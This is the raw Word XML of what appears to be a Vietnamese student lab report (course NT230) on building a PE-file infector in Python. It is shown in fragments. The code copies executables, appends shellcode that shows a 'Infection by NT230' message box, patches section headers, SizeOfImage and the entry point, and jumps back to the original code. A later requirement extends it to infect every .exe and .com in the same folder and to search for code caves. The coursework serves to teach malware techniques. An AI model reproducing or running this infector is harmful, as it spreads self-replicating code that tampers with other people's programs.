    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0CC854AF" wp14:textId="3495F5E7">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.SizeOfRawData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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="78CD4E77" wp14:textId="72FA91F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59B20AA7" wp14:textId="132BCCEA">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Tăng SizeOfImage lên 500 trong Optional Headers</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="64B96416" wp14:textId="7C63E70E">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.OPTIONAL_HEADER.SizeOfImage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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7F9439A8" wp14:textId="7B298D5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36CDC9DE" wp14:textId="48535867">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Chỉnh sửa AddressOfEntryPoint trong Optional Headers</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="232D17BC" wp14:textId="050F3586">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.OPTIONAL_HEADER.AddressOfEntryPoint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422ABD5E" wp14:textId="01E0C99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025440B4" wp14:textId="7867111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Lưu lại các thay đổi vào file PE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0F182BD7" wp14:textId="1D10E598">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Ghi các thay đổi trở lại file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="677A4FFD" wp14:textId="55E9486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Đưa con trỏ về đầu file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1B729030" wp14:textId="5C42607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.write())  </w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="7CA668"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Ghi lại dữ liệu PE đã chỉnh sửa</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3998BA13" wp14:textId="50508CB7">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Toàn bộ chương trình sẽ có dạng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7322AF21" wp14:textId="2AEB9F99">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shutil</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1406D8D1" wp14:textId="6945AC0F">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pefile</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2B01AC53" wp14:textId="14F4DE9C">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6621A84E" wp14:textId="284CD93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0BC2CA03" wp14:textId="6A31C9E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Danh sách các file nguồn và file mới sẽ tạo</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="51F3D583" wp14:textId="11FBB2C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filenames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"NOTEPAD.EXE"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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5141D29C" wp14:textId="5AAE2DD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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="38370028" wp14:textId="463115D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0186F88E" wp14:textId="393D7FD0">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Lặp qua mỗi file trong danh sách và tạo file mới có tên kết thúc bằng "-inject.exe"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="66E21BF0" wp14:textId="2CA8CF9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5A508E3" wp14:textId="6E9D4931">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Tạo tên file mới</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="60515AF6" wp14:textId="378C06F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-inject.exe"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Cắt phần ".exe" và thêm "-inject.exe"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="47C9369C" wp14:textId="669B803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append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216A2CD" wp14:textId="1B37DA3F">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Copy file nguồn sang file mới</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="728132D5" wp14:textId="312539A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shutil</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copyfile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AD18143" wp14:textId="3E29A236">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="24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7FD6573E" wp14:textId="534C904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4A65D53" wp14:textId="4A65559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4DC3CD9" wp14:textId="7EBA8EA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"This is a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85D0BEA" wp14:textId="3FA16DC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path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getsize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F7FF1B6" wp14:textId="222C7D8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Load file PE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="57535B27" wp14:textId="307ED91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pefile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.PE(</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049F9C1" wp14:textId="5EF5D44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427D7ED8" wp14:textId="049F2466">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Lấy thông tin từ Optional Header</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="01B11F75" wp14:textId="54425A1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.OPTIONAL_HEADER.AddressOfEntryPoint</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="485E6D0A" wp14:textId="78FB59B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.OPTIONAL_HEADER.ImageBase</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="066C053C" wp14:textId="31257CB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64951DEB" wp14:textId="003C769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"AddressOfEntryPoint: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hex</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A1D1ECD" wp14:textId="54DBC96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"ImageBase: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hex</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A43EBDA" wp14:textId="76EB40E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4DCC2DD5" wp14:textId="3D714D9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Lấy thông tin từ Section Header của section cuối cùng</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7D2D6E07" wp14:textId="0417DDA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.sections:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2E01D2FB" wp14:textId="5362207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.sections[</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1</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Section cuối cùng trong danh sách các section</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="43A05403" wp14:textId="4078CE4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virtual_size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.Misc_VirtualSize</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4B740B2C" wp14:textId="0566823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.VirtualAddress</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2E1003EF" wp14:textId="55666C1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.SizeOfRawData</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0845A2AD" wp14:textId="3DC678B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pointer_to_raw_data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.PointerToRawData</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="31B26BC8" wp14:textId="08E4BF3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name_section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.Name.decode().rstrip(</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\x00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3B8A4FF" wp14:textId="0EB72F6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63DE1B80" wp14:textId="15F248E7">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Kiểm tra xem có import table không và lấy thông tin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="578C4900" wp14:textId="00C3A00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AFF0BF6" wp14:textId="074379B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hasattr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'DIRECTORY_ENTRY_IMPORT'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5C5A273" wp14:textId="13380E4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entry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.DIRECTORY_ENTRY_IMPORT:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7B4EA8FC" wp14:textId="4922C11A">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Tìm thư viện USER32.dll</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2599903D" wp14:textId="6921BE7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entry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.dll.decode().lower()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'user32.dll'</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B589908" wp14:textId="745FEA4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imp</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entry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.imports:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6D838BDD" wp14:textId="35D128B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Tìm hàm MessageBoxW</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="54B8BC91" wp14:textId="75C5CBA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imp</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.name.decode()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ED9DFC0" wp14:textId="59BF704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imp</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.address</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4D0D93FA" wp14:textId="70790A2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"MessageBoxW address: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hex</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imp</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.address)</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AA69AEA" wp14:textId="2B72A123">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="C586C0"/>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break</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3F8A9FB9" wp14:textId="1AD23B2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else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DF09FCF" wp14:textId="5D4F75B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"No import table found."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810ED33" wp14:textId="521F21B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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7EDDDA92" wp14:textId="51AE4BE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####Mở rộng file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="66BC027B" wp14:textId="73B5EB8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Số lượng byte muốn thêm vào cuối file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6BE2CDAC" wp14:textId="35924F4D">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500</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7F0EDFCC" wp14:textId="2A4AD81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4B98B491" wp14:textId="11B1FED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Mở file ở chế độ append binary ('ab') và sử dụng os to seek to the end of the file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3F3B74E5" wp14:textId="12BC295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'ab'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B78CB3F" wp14:textId="7F98A74B">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SEEK_END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Di chuyển con trỏ đến cuối file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0A7C1DCC" wp14:textId="1538DBE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\x00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Thêm 500 byte giá trị 0x00</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7CAB3F32" wp14:textId="2F67FA1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35793BC5" wp14:textId="15B9238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"File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 xml:space="preserve"> has been extended by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 xml:space="preserve"> bytes."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C28A882" wp14:textId="71ED1C4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38BF3799" wp14:textId="48A8055E">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####Thực hiện tính toán</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0DE8F766" wp14:textId="3EC5AF49">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caption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40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pointer_to_raw_data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605B8FB7" wp14:textId="04A2F1A0">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80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pointer_to_raw_data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4747DD2E" wp14:textId="037D19D5">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pointer_to_raw_data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virtual_address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0072C763" wp14:textId="47A4939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relative_VA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19</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955A993" wp14:textId="2318F10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150B86A7" wp14:textId="67F40721">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####Chuẩn bị shell_code</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="074EBEC9" wp14:textId="572AFC27">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#push 0</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="29D48B5E" wp14:textId="13B006A3">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\x6a\x00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79DA0F5A" wp14:textId="1E43F518">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#push caption</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="460A2CB1" wp14:textId="5709F8E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\x68</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caption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byteorder</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F4B47C4" wp14:textId="1D186C5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#push text</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="489D3FAC" wp14:textId="04555CA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\x68</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byteorder</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63D23FA" wp14:textId="5BB495EA">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#push 0</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4C1BE382" wp14:textId="28A5E843">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\x6a\x00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3920B4D" wp14:textId="5A8D3F44">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#call MessageBoxW</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="184CE3B5" wp14:textId="2B4E3A7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\xff\x15</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MessageBoxW</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byteorder</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2FE693A" wp14:textId="7D19177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#jmp to original entry point</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="50976E30" wp14:textId="1B4E972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\xe9</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relative_VA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byteorder</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signed</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True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09623E1" wp14:textId="1939957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13175077" wp14:textId="7F3A691F">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#Chuẩn bị caption và text</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4F7C1704" wp14:textId="119D9778">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caption_text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\x49\x00\x6E\x00\x66\x00\x65\x00\x63\x00\x74\x00\x69\x00\x6F\x00\x6E\x00\x20\x00\x62\x00\x79\x00\x20\x00\x4E\x00\x54\x00\x32\x00\x33\x00\x30\x00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232A69A" wp14:textId="7EEEC423">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text_text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\x32\x00\x31\x00\x35\x00\x32\x00\x32\x00\x30\x00\x36\x00\x35\x00\x2D\x00\x32\x00\x31\x00\x35\x00\x32\x00\x31\x00\x39\x00\x35\x00\x35\x00\x2D\x00\x32\x00\x31\x00\x35\x00\x32\x00\x30\x00\x32\x00\x33\x00\x37\x00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5932A767" wp14:textId="39A0537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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="42437881" wp14:textId="01DF26F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####Thực hiện chèn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5647E8C6" wp14:textId="100C904B">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Mở file để đọc và ghi nhị phân</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2EF9A754" wp14:textId="267920A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'r+b'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4BE2ED5" wp14:textId="62A3F16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đến vị trí chèn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1974BA44" wp14:textId="4D4C91E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AFB4907" wp14:textId="499F26AF">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Chèn chuỗi byte</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="59C2505F" wp14:textId="04AA739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shell_code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42545BC" wp14:textId="07143C8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3331FC53" wp14:textId="130CBA4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đến vị trí chèn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6C75BDE3" wp14:textId="283592A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40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DC49289" wp14:textId="72630EB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Chèn chuỗi byte</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="09A90DEC" wp14:textId="74E5395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caption_text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20B2435" wp14:textId="4DB5B5A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16ED163C" wp14:textId="1D2919E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đến vị trí chèn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="646BF1C3" wp14:textId="3D7A041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size_of</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80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6706E25" wp14:textId="1E966A90">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Chèn chuỗi byte</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6350F08C" wp14:textId="5DE124E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text_text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3C92CB8" wp14:textId="4500F2B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250B4559" wp14:textId="79122CA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'r+b'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26C3F43" wp14:textId="073ECDCB">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Thay đổi .rsrc Section Header</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7F5D0386" wp14:textId="08756AFC">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.Misc_VirtualSize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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="49599801" wp14:textId="5EFA10A2">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last_section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.SizeOfRawData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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="39832C25" wp14:textId="205A288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773D2985" wp14:textId="6289FC6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Tăng SizeOfImage lên 500 trong Optional Headers</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="097948D8" wp14:textId="4F9B9589">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.OPTIONAL_HEADER.SizeOfImage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num_bytes_to_add</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="319C0E45" wp14:textId="49C0211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05C6A534" wp14:textId="7C11DC9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Chỉnh sửa AddressOfEntryPoint trong Optional Headers</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3DEE83B9" wp14:textId="4F503A9C">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.OPTIONAL_HEADER.AddressOfEntryPoint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29E1E7E3" wp14:textId="149BD02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2E5E6B64" wp14:textId="763125D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Lưu lại các thay đổi vào file PE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="50D1BCDD" wp14:textId="27A9FF9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Ghi các thay đổi trở lại file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7CF73543" wp14:textId="40C9368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Đưa con trỏ về đầu file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="773D2686" wp14:textId="19F7D79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.write())  </w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="7CA668"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Ghi lại dữ liệu PE đã chỉnh sửa</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5D74E947" wp14:textId="23D928C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"File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 xml:space="preserve"> has been injected successfully."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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="48024528" wp14:textId="7692EE8F">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Đóng file PE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4C05AE2B" wp14:textId="551BB8C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.close()</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3300C3C8" wp14:textId="2676374F">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Thực hiện chạy đoạn mã trên và kết quả thu được là:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1602372A" wp14:textId="16F3265B">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>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31577B07" wp14:textId="65E0361A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>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69CAD0C5" wp14:textId="4B0BA2B8">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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mức yêu cầu 02 - RQ02 (2đ):</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virus đạt được RQ01 và có khả năng lây nhiễm qua các file thực thi khác cùng thư mục khi người dùng kích hoạt tập tin chủ.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4CADC49F" wp14:textId="042FF9E7">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Để thực hiện được việc lây nhiễm cho các folder có cùng thư mục thì em sẽ modify lại file trên. Tiến hành duyệt trong folder hiện tại các file .exe hoặc .com và copy file đó với đuôi là -inject</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="73CD2C5B" wp14:textId="62B1A28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Danh sách các file nguồn và file inject</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3795D5A8" wp14:textId="042C0B2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filenames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    </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="03F56FE2" wp14:textId="005B806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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="30FCC6FC" wp14:textId="75D5C9E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7FCEBBC0" wp14:textId="015538B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Lấy tất cả các file .exe và .com trong thư mục hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="55007D1E" wp14:textId="0EBA4C7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exe_files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glob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glob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'*.exe'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15359D2" wp14:textId="4B0412F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com_files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glob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glob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'*.com'</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4DCC00C" wp14:textId="3D51B83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111685F4" wp14:textId="51BEC66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Kết hợp danh sách các file .exe và .com</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="55526558" wp14:textId="7504B38A">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executable_files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exe_files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com_files</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="69B52479" wp14:textId="4A4B149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526BBD69" wp14:textId="30F167D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Lặp qua mỗi file trong danh sách và tạo file mới có tên kết thúc bằng "-inject.exe"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="48D6E53C" wp14:textId="58E6CCB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executable_files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61D713B" wp14:textId="6EF487BB">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Tạo tên file mới</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="47945743" wp14:textId="3738E2B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append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6EE03C5" wp14:textId="41004166">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-inject.exe"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Cắt phần ".exe" và thêm "-inject.exe"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0686A43B" wp14:textId="66FEFE3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append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3358782" wp14:textId="283219C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Copy file nguồn sang file mới</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6DA36ABE" wp14:textId="0583E6D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shutil</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copyfile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40220D1" wp14:textId="06E24188">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Để cải tiến đoạn mã ở RQ1 thì sang RQ2 nhóm chọn cách tìm những chỗ trống để inject shell code. Hàm findSection là hàm duyệt qua từng section và tìm kiếm vị trí trống đủ để chèn shellcode vào</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7083263C" wp14:textId="7A391A6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569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def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findSection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B9368C4" wp14:textId="11EF852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"rb"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E0D6C66" wp14:textId="121BBF4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.sections:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="57EA9045" wp14:textId="42028F9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.SizeOfRawData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4B6E8E4" wp14:textId="5A972C30">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="27A37C49" wp14:textId="4CD5C9BE">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.PointerToRawData,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con trỏ đến đầu section</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="508114EA" wp14:textId="1B09DB6A">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="057185A8" wp14:textId="4F16530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while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&lt;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.SizeOfRawData:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3E6B4AF0" wp14:textId="0425672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read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1</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DD47D15" wp14:textId="6B822095">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w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4FE534B2" wp14:textId="5D5C256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00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0DE81C2" wp14:textId="1360C0A8">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w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="540784A5" wp14:textId="2C4D5D3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else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5937D85" wp14:textId="5F868C2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&gt;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minShellCode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FE00733" wp14:textId="3A32BA3B">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raw_addr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.PointerToRawData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w:t>
      </w:r>
    </w:p>
